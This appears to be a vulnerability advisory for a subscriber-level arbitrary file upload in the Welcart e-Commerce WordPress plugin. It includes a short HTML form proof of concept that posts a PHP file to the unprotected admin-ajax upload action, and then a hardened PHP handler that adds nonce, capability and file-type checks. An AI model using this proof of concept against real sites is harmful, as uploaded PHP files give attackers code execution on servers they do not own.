wpexploit | Benachi | WPEX-ID:6D29BA12-F14A-4CEE-BAAE-A6049D83BCE6
History: Nov 10, 2023 - 12:00 a.m.

Welcart e-Commerce < 2.9.5 - Subscriber+ Arbitrary File Upload

2023-11-10 00:00:00
Benachi

Tags: arbitrary file upload, settlement settings, security, php file, admin-ajax.php, certificate upload

AI Score: 7.4 High (Confidence: Low)
EPSS: 0.001 Low (Percentile: 19.3%)

Description: The plugin does not validate uploaded files, and the AJAX action that handles the upload has neither an authorisation check nor CSRF protection. As a result, any authenticated user, such as a subscriber, can upload arbitrary files, including PHP scripts, to the server.

Setup (as admin):
- Go to the Settlement Settings and drag the "ペイジェント" (Paygent) module to the 'Settlement modules in use' section, then click the update button
- Set up the module and upload a certificate

Attack (as a subscriber): log in to the blog, open a page with the code below and select a PHP file:
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
        <input type="text" name="action" value="upload_certificate_file"/>
        <input type="file" name="upfile"/>
        <input type="submit" value="submit"/>
    </form>
</body>

This will upload the PHP file to the uploads/xxxxx/ folder.
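The controls whose absence the advisory describes (CSRF nonce, authorisation, file validation) in a WordPress AJAX upload handler, as an added example that is not Welcart's code; the action and field names follow the PoC above, while the nonce name, the capability and the certificate extension allowlist are assumptions.

```php
<?php
// Added illustration, not Welcart's own handler: a hardened version of an
// admin-ajax upload action. Nonce name, capability and allowlist are assumed.

add_action( 'wp_ajax_upload_certificate_file', 'hardened_upload_certificate_file' );

function hardened_upload_certificate_file() {
    // 1. CSRF: the request must carry a nonce issued to this user for this
    //    action; check_ajax_referer() dies with HTTP 403 if it is missing or bad.
    check_ajax_referer( 'upload_certificate_file', 'nonce' );

    // 2. Authorisation: only users allowed to change plugin settings, not every
    //    logged-in subscriber. The capability chosen here is an assumption.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Validation: require a successfully received file and restrict it to
    //    certificate types. The allowlist is an assumption about the module.
    if ( empty( $_FILES['upfile'] ) || UPLOAD_ERR_OK !== $_FILES['upfile']['error'] ) {
        wp_send_json_error( 'no file received', 400 );
    }
    $allowed = array(
        'pem' => 'application/x-pem-file',
        'crt' => 'application/x-x509-ca-cert',
    );
    // wp_check_filetype_and_ext() matches the filename extension against the
    // allowlist, so a .php upload gets no ext/type and is rejected. It does not
    // inspect the contents of non-image files, so the upload directory should
    // additionally be served with PHP execution disabled.
    $check = wp_check_filetype_and_ext( $_FILES['upfile']['tmp_name'], $_FILES['upfile']['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'file type not allowed', 415 );
    }

    // Hand off to WordPress: 'mimes' re-applies the allowlist inside
    // wp_handle_upload(), and 'test_form' is off because this is an AJAX call.
    $result = wp_handle_upload( $_FILES['upfile'], array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( array( 'file' => basename( $result['file'] ) ) );
}
```

The calling form would then also need to send the nonce (from wp_create_nonce( 'upload_certificate_file' )) as the `nonce` field, which is exactly what the PoC form above cannot supply.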

